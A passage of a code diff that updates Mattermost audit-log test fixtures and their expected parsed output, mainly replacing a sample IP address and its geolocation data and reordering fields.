Z","event":"removeChannelMember","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/members/ag99yu4i1if63jrui63tsmq57y","channel":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"P"},"remove_user_id":"ag99yu4i1if63jrui63tsmq57y","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:03:01.043 Z","event":"getConfig","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/config","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:03:13.849 Z","event":"createChannel","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/channels","channel":{"id":"j3g9ysx6q3nh3q5kiyh3wrugha","name":"test","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:04:01.294 Z","event":"deleteChannel","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/channels/j3g9ysx6q3nh3q5kiyh3wrugha","channeld":{"id":"j3g9ysx6q3nh3q5kiyh3wrugha","name":"test","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:12:11.211 
Z","event":"getConfig","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/config","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:12:23.085 Z","event":"patchTeam","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/patch","patched":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"team":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:12:29.655 Z","event":"patchTeam","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/patch","patched":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"team":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:12:46.044 Z","event":"createTeam","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/teams","team":{"id":"dqpybz1o3pbuzf7876u834nura","name":"another-team","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:18:13.183 
Z","event":"removeTeamMember","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/teams/dqpybz1o3pbuzf7876u834nura/members/ag99yu4i1if63jrui63tsmq57y","team":{"id":"dqpybz1o3pbuzf7876u834nura","name":"another-team","type":"O"},"user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:18:17.907 Z","event":"revokeAllSessionsForUser","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/users/ag99yu4i1if63jrui63tsmq57y/sessions/revoke/all","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 01:02:56.163 Z","event":"patchUser","status":"success","user_id":"cuk45yubk3nq8g7udrhojbk8ty","session_id":"6s4sy7p1b3fqdc3fktsh4yznhr","ip_address":"89.160.20.156","api_path":"/api/v4/users/me/patch","patch":{"id":"cuk45yubk3nq8g7udrhojbk8ty","name":"other1","roles":"system_user system_admin"},"user":{"id":"cuk45yubk3nq8g7udrhojbk8ty","name":"other","roles":"system_user system_admin"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 01:13:26.358 
Z","event":"addTeamMembers","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"f57d8pkf7iyg8xo6ttq73ggcnr","ip_address":"89.160.20.156","api_path":"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch","count":1,"errors":"[]","team":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"user_ids":"[cuk45yubk3nq8g7udrhojbk8ty]","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 01:13:08.904 Z","event":"addTeamMembers","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"f57d8pkf7iyg8xo6ttq73ggcnr","ip_address":"89.160.20.156","api_path":"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch","count":1,"errors":"[cuk45yubk3nq8g7udrhojbk8ty:JoinUserToTeam: The user cannot be added as the domain associated with the account is not permitted. Contact your System Administrator for additional details., ]","team":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"user_ids":"[cuk45yubk3nq8g7udrhojbk8ty]","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 01:20:06.246 Z","event":"addTeamMembers","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"f57d8pkf7iyg8xo6ttq73ggcnr","ip_address":"89.160.20.156","api_path":"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch","count":2,"errors":"[cuk45yubk3nq8g7udrhojbk8ty:JoinUserToTeam: The user cannot be added as the domain associated with the account is not permitted. Contact your System Administrator for additional details., z63ehbxy47fwpc8bmz9ouuh7fe:JoinUserToTeam: The user cannot be added as the domain associated with the account is not permitted. 
Contact your System Administrator for additional details., ]","team":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"user_ids":"[cuk45yubk3nq8g7udrhojbk8ty z63ehbxy47fwpc8bmz9ouuh7fe]","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} {"timestamp":"2021-12-05 17:21:36.724 Z","event":"deleteTeam","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"5timirrr5785mb3q1wutb5unrr","ip_address":"127.0.0.1","api_path":"/api/v4/teams/knrndtys13rzzk48ugm7mssnke","team":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"mmctl/5.31.0 (linux)"} -{"timestamp":"2021-12-05 17:24:33.077 Z","event":"updateUserActive","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"jnqqnh3onjympe4u8pa5mgtexw","ip_address":"55.33.6.7","active":false,"api_path":"/api/v4/users/z63ehbxy47fwpc8bmz9ouuh7fe/active","user":{"id":"z63ehbxy47fwpc8bmz9ouuh7fe","name":"other2","roles":"system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} \ No newline at end of file +{"timestamp":"2021-12-05 17:24:33.077 Z","event":"updateUserActive","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"jnqqnh3onjympe4u8pa5mgtexw","ip_address":"89.160.20.156","active":false,"api_path":"/api/v4/users/z63ehbxy47fwpc8bmz9ouuh7fe/active","user":{"id":"z63ehbxy47fwpc8bmz9ouuh7fe","name":"other2","roles":"system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} \ No newline at end of file 
diff --git a/packages/mattermost/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json b/packages/mattermost/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json
index 6c66544f3ac..e754c886be1 100644
--- a/packages/mattermost/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json
+++ b/packages/mattermost/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json
@@ -1,6 +1,18 @@
 {
 "expected": [
 {
+ "@timestamp": "2021-12-04T23:19:32.051Z",
+ "ecs": {
+ "version": "1.12"
+ },
+ "related": {
+ "user": [
+ "ag99yu4i1if63jrui63tsmq57y"
+ ],
+ "ip": [
+ "89.160.20.156"
+ ]
+ },
 "mattermost": {
 "audit": {
 "cluster": {
@@ -14,45 +26,29 @@
 },
 "source": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Östergötland County",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 15.6167,
+ "lat": 58.4167
+ }
 },
 "as": {
- "number": 721,
+ "number": 29518,
 "organization": {
- "name": "DoD Network Information Center"
+ "name": "Bredband2 AB"
 }
 },
- "address": "55.33.6.7",
- "ip": "55.33.6.7"
- },
- "url": {
- "path": "/api/v4/config",
- "original": "/api/v4/config"
- },
- "tags": [
- "preserve_original_event"
- ],
- "@timestamp": "2021-12-04T23:19:32.051Z",
- "ecs": {
- "version": "1.12"
- },
- "related": {
- "user": [
- "ag99yu4i1if63jrui63tsmq57y"
- ],
- "ip": [
- "55.33.6.7"
- ]
+ "address": "89.160.20.156",
+ "ip": "89.160.20.156"
 },
 "event": {
- "ingested": "2021-12-08T15:26:55.209438182Z",
- "original": "{\"timestamp\":\"2021-12-04 23:19:32.051 Z\",\"event\":\"updateConfig\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"pjh4n69j3p883k7hhzippskcba\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/config\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}",
+ "ingested": "2021-12-15T08:59:12.543273278Z",
+ "original": "{\"timestamp\":\"2021-12-04 23:19:32.051 Z\",\"event\":\"updateConfig\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"pjh4n69j3p883k7hhzippskcba\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/config\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}",
 "kind": "event",
 "action": "updateConfig",
 "category": [
@@ -66,6 +62,10 @@
 "user": {
 "id": "ag99yu4i1if63jrui63tsmq57y"
 },
+ "url": {
+ "path": "/api/v4/config",
+ "original": "/api/v4/config"
+ },
 "user_agent": {
 "name": "Chrome",
 "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
@@ -78,9 +78,24 @@
 "name": "Other"
 },
 "version": "96.0.4664.45"
- }
+ },
+ "tags": [
+ "preserve_original_event"
+ ]
 },
 {
+ "@timestamp": "2021-12-04T23:19:48.599Z",
+ "ecs": {
+ "version": "1.12"
+ },
+ "related": {
+ "user": [
+ "ag99yu4i1if63jrui63tsmq57y"
+ ],
+ "ip": [
+ "89.160.20.156"
+ ]
+ },
 "mattermost": {
 "audit": {
 "cluster": {
@@ -94,45 +109,29 @@
 },
 "source": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Östergötland County",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": 15.6167,
+ "lat": 58.4167
+ }
 },
 "as": {
- "number": 721,
+ "number": 29518,
 "organization": {
- "name": "DoD Network Information Center"
+ "name": "Bredband2 AB"
 }
 },
- "address": "55.33.6.7",
- "ip": "55.33.6.7"
- },
- "url": {
- "path": "/api/v4/config",
- "original": "/api/v4/config"
- },
- "tags": [
- "preserve_original_event"
- ],
- "@timestamp": "2021-12-04T23:19:48.599Z",
- "ecs": {
- "version": "1.12"
- },
- "related": {
- "user": [
- "ag99yu4i1if63jrui63tsmq57y"
- ],
- "ip": [
- "55.33.6.7"
- ]
+ "address": "89.160.20.156",
+ "ip": "89.160.20.156"
 },
 "event": {
- "ingested": "2021-12-08T15:26:55.209464858Z",
- "original": "{\"timestamp\":\"2021-12-04 23:19:48.599 Z\",\"event\":\"updateConfig\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"pjh4n69j3p883k7hhzippskcba\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/config\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}",
+ "ingested": "2021-12-15T08:59:12.543277412Z",
+ "original": "{\"timestamp\":\"2021-12-04 23:19:48.599 Z\",\"event\":\"updateConfig\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"pjh4n69j3p883k7hhzippskcba\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/config\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}",
 "kind": "event",
 "action": "updateConfig",
 "category": [
@@ -146,6 +145,10 @@
 "user": {
 "id": "ag99yu4i1if63jrui63tsmq57y"
 },
+ "url": {
+ "path": "/api/v4/config",
+ "original": "/api/v4/config"
+ },
 "user_agent": {
 "name": "Chrome",
 "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
@@ -158,9 +161,24 @@
 "name": "Other"
 },
 "version": "96.0.4664.45"
- }
+ },
+ "tags": [
+ "preserve_original_event"
+ ]
 },
 {
+ "@timestamp": "2021-12-04T23:19:51.324Z",
+ "ecs": {
+ "version": "1.12"
+ },
+ "related": {
+ "user": [
+ "ag99yu4i1if63jrui63tsmq57y"
+ ],
+ "ip": [
+ "89.160.20.156"
+ ]
+ },
 "mattermost": {
 "audit": {
 "cluster": {
@@ -174,45 +192,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/users/logout", - "original": "/api/v4/users/logout" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-04T23:19:51.324Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209471639Z", - "original": "{\"timestamp\":\"2021-12-04 23:19:51.324 Z\",\"event\":\"Logout\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"pjh4n69j3p883k7hhzippskcba\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/users/logout\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543278999Z", + "original": "{\"timestamp\":\"2021-12-04 23:19:51.324 Z\",\"event\":\"Logout\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"pjh4n69j3p883k7hhzippskcba\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/users/logout\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "Logout", 
"category": [ @@ -227,6 +229,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/users/logout", + "original": "/api/v4/users/logout" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -239,9 +245,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-04T23:19:58.729Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { 
@@ -252,45 +273,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/users/login", - "original": "/api/v4/users/login" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-04T23:19:58.729Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209477057Z", - "original": "{\"timestamp\":\"2021-12-04 23:19:58.729 Z\",\"event\":\"login\",\"status\":\"success\",\"user_id\":\"\",\"session_id\":\"\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/users/login\",\"device_id\":\"\",\"login_id\":\"admin\",\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543281762Z", + "original": "{\"timestamp\":\"2021-12-04 23:19:58.729 Z\",\"event\":\"login\",\"status\":\"success\",\"user_id\":\"\",\"session_id\":\"\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/users/login\",\"device_id\":\"\",\"login_id\":\"admin\",\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin 
system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "login", "category": [ @@ -312,6 +317,10 @@ "id": "ag99yu4i1if63jrui63tsmq57y" } }, + "url": { + "path": "/api/v4/users/login", + "original": "/api/v4/users/login" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -324,9 +333,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-04T23:20:33.027Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "patch": { 
@@ -345,45 +369,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/users/me/patch", - "original": "/api/v4/users/me/patch" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-04T23:20:33.027Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209482533Z", - "original": "{\"timestamp\":\"2021-12-04 23:20:33.027 Z\",\"event\":\"patchUser\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/users/me/patch\",\"patch\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543283249Z", + "original": "{\"timestamp\":\"2021-12-04 23:20:33.027 
Z\",\"event\":\"patchUser\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/users/me/patch\",\"patch\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "patchUser", "category": [ @@ -406,6 +414,10 @@ "id": "ag99yu4i1if63jrui63tsmq57y" } }, + "url": { + "path": "/api/v4/users/me/patch", + "original": "/api/v4/users/me/patch" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -418,9 +430,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-04T23:20:37.771Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "patch": { 
@@ -439,45 +466,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/users/me/patch", - "original": "/api/v4/users/me/patch" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-04T23:20:37.771Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209487988Z", - "original": "{\"timestamp\":\"2021-12-04 23:20:37.771 Z\",\"event\":\"patchUser\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/users/me/patch\",\"patch\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543284621Z", + "original": "{\"timestamp\":\"2021-12-04 23:20:37.771 
